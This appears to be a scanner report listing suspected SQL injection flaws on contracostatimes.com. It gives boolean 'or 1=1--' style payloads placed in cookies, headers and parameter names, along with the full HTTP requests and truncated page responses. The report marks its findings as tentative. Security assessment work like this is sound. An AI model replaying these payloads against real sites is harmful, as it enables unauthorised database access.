<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Antioch police say that pair likely had been arguing before attack'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Woman stabbed to death in Antioch; suspect arrested - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.Home"; var CM8Profile="";
</script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn"; MNGiRegistrationUrl = "https://secure.www.contracostatime ...[SNIP]...
The s_sq cookie appears to be vulnerable to SQL injection attacks. The payloads 43929352'%20or%201%3d1--%20 and 43929352'%20or%201%3d2--%20 were each submitted in the s_sq cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /ci_16790963?source=most_viewed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D43929352'%20or%201%3d1--%20; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Antioch police say that pair likely had been arguing before attack'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Woman stabbed to death in Antioch; suspect arrested - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.Home"; var CM8Profile="";
</script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/mngi/servletDispatch/Er ...[SNIP]...
Request 2
GET /ci_16790963?source=most_viewed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D43929352'%20or%201%3d2--%20; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Antioch police say that pair likely had been arguing before attack'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Woman stabbed to death in Antioch; suspect arrested - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.Home"; var CM8Profile="";
</script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn"; MNGiRegistrationUrl = "https://secure.www.contracostatime ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /ci_16791142 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d1--%20
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Gift-wrapping falls out of favor to gift bags and greener times'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Ghost of Christmas past - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.Home"; var CM8Profile="";
</script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn"; MNG ...[SNIP]...
Request 2
GET /ci_16791142 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d2--%20
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Gift-wrapping falls out of favor to gift bags and greener times'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Ghost of Christmas past - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
The currBrandCheck cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the currBrandCheck cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /ci_16792343?source=most_viewed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes'%20and%201%3d1--%20; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The owners of the El Balazo restaurant chain have been charged with 20 counts of tax evasion, conspiracy and employing more than 60 illegal immigrants at their restaurants.'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Owners of El Balazo restaurant chain charged with tax fraud and hiring illegal immigrants - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.Home"; var CM8Profile="";
</script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><scri ...[SNIP]...
Request 2
GET /ci_16792343?source=most_viewed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes'%20and%201%3d2--%20; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The owners of the El Balazo restaurant chain have been charged with 20 counts of tax evasion, conspiracy and employing more than 60 illegal immigrants at their restaurants.'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Owners of El Balazo restaurant chain charged with tax fraud and hiring illegal immigrants - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.Home"; var CM8Profile="";
</script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginUrl = "https:/ ...[SNIP]...
The u cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the u cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /ci_16792616?source=most_emailed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B'%20and%201%3d1--%20; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='PayPal co-founder Peter Thiel is convening an unusual philanthropic summit where hell introduce wealthy tech figures to nonprofit groups exploring such ideas as artificial intelligence, extending human life and building communities on the high seas.'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Silicon Valley billionaire backs futuristic philanthropy - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.Home"; var CM8Profile="";
</script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language="JavaScript" type="text/ ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads 10497043'%20or%201%3d1--%20 and 10497043'%20or%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /news/ci_16783847?source=rss&nclick_check=1 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)10497043'%20or%201%3d1--%20
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The red- and green-dressed festive drinkers are participating in SantaCon, an annual national event involving people dressing up in Santa costumes and taking to the streets, which in San Francisco began in 1994.'><meta name="keywords" content="news newsmainfront breaking crime accident police development city council government strike court disaster environment breaking news"/><title>Hundreds don red suits for SantaCon in San Francisco - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.News.Front"; var CM8Profile=""; </script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get pr ...[SNIP]...
Request 2
GET /news/ci_16783847?source=rss&nclick_check=1 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)10497043'%20or%201%3d2--%20
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The red- and green-dressed festive drinkers are participating in SantaCon, an annual national event involving people dressing up in Santa costumes and taking to the streets, which in San Francisco began in 1994.'><meta name="keywords" content="news newsmainfront breaking crime accident police development city council government strike court disaster environment breaking news"/><title>Hundreds don red suits for SantaCon in San Francisco - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.News.Front"; var CM8Profile=""; </script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language="JavaScript" type="text/javascript"> MNGiRegistration ...[SNIP]...
The EMETA_COOKIE_CHECK_MNGI cookie appears to be vulnerable to SQL injection attacks. The payloads 17543039%20or%201%3d1--%20 and 17543039%20or%201%3d2--%20 were each submitted in the EMETA_COOKIE_CHECK_MNGI cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /news/ci_16791147?source=rss&nclick_check=1 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=117543039%20or%201%3d1--%20; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='In recent years, home brewing has gone from a one-time illegal practice to a hobby and business that has inspired clubs, organizations and competitions such as the one at the Beer Revolution. '><meta name="keywords" content="news newsmainfront breaking crime accident police development city council government strike court disaster environment breaking news"/><title>Home brewing on the rise in the Bay Area - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.News.Front"; var CM8Profile=""; </script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language ...[SNIP]...
Request 2
GET /news/ci_16791147?source=rss&nclick_check=1 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=117543039%20or%201%3d2--%20; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='In recent years, home brewing has gone from a one-time illegal practice to a hobby and business that has inspired clubs, organizations and competitions such as the one at the Beer Revolution. '><meta name="keywords" content="news newsmainfront breaking crime accident police development city council government strike court disaster environment breaking news"/><title>Home brewing on the rise in the Bay Area - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.News.Front"; var CM8Profile=""; </script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginUrl = "https://secure.pas ...[SNIP]...
1.142. http://www.contracostatimes.com/news/ci_16791147 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://www.contracostatimes.com
Path: /news/ci_16791147
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 23783182%20or%201%3d1--%20 and 23783182%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /news/ci_16791147?123783182%20or%201%3d1--%20=1 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='In recent years, home brewing has gone from a one-time illegal practice to a hobby and business that has inspired clubs, organizations and competitions such as the one at the Beer Revolution. '><meta name="keywords" content="news newsmainfront breaking crime accident police development city council government strike court disaster environment breaking news"/><title>Home brewing on the rise in the Bay Area - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.News.Front"; var CM8Profile=""; </script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language ...[SNIP]...
Request 2
GET /news/ci_16791147?123783182%20or%201%3d2--%20=1 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
